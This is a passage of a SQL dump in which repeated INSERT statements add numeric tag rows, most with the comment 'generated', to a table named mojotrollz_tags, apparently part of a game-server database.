VALUES (111259, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111260, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111261, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111262, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111265, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111266, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111268, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111269, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111271, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111942, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111943, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111945, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111946, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111948, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111949, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111950, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111969, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111973, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111974, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111979, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112012, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112042, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112043, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112044, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112045, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112048, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112049, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112050, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112051, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112052, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112053, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112054, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112055, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112058, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112059, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112060, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112061, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112062, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112065, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112066, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112070, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112071, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112072, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112073, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112074, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112079, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112192, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112194, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112195, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112196, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112197, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112198, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112199, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112200, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112201, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112202, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112204, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112205, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112215, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112216, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112217, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112223, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112231, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112232, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112234, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112235, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112236, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112237, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112238, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112239, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112241, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112301, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112302, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112303, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112305, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112308, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112309, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112310, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112311, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112312, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112316, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112317, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112318, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112319, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112321, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112322, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112881, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112888, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112898, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112901, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112902, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112903, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112904, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112905, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112906, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112907, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112948, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113528, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113529, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113531, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113540, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113568, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113569, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113570, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113571, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113572, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113574, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113575, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113576, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113577, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113752, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113753, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113754, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113755, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113756, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113757, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113757, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113768, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113769, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113770, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113771, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113791, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (120584, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (121264, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123207, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123207, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123208, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123208, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123209, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123209, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123210, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123210, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123211, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123211, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123212, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123212, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123213, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123213, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123214, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123244, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123309, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123310, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123328, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123329, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123329, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123330, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123331, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123333, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123334, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123462, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123463, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123463, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123848, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124072, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124367, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124367, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124368, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124368, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124369, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124369, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124370, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124370, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124371, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124371, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124372, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124372, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124374, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124388, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124389, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (125475, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (125477, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (125477, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126046, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126049, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126050, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126051, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126052, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126053, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126158, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126260, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126312, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126313, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126314, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126335, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126337, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126338, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126339, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126340, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126341, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126342, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126345, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (128196, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (128293, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (128308, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (128308, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (128403, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (128403, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (129127, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (129206, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (130125, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (130126, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (130511, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (130511, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (130666, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (130667, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (130668, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (131474, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (131474, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (131978, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (131978, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (133234, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (133234, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (133466, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (133467, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (133468, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (133469, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136101, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136922, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136922, 2, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136923, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136923, 2, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136925, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136925, 2, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136926, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136927, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136928, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136929, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136930, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136931, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136945, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136947, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136948, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136949, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136950, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136951, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136952, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136954, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136955, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136957, 2, 1, 229, 'generated'); INSERT INTO 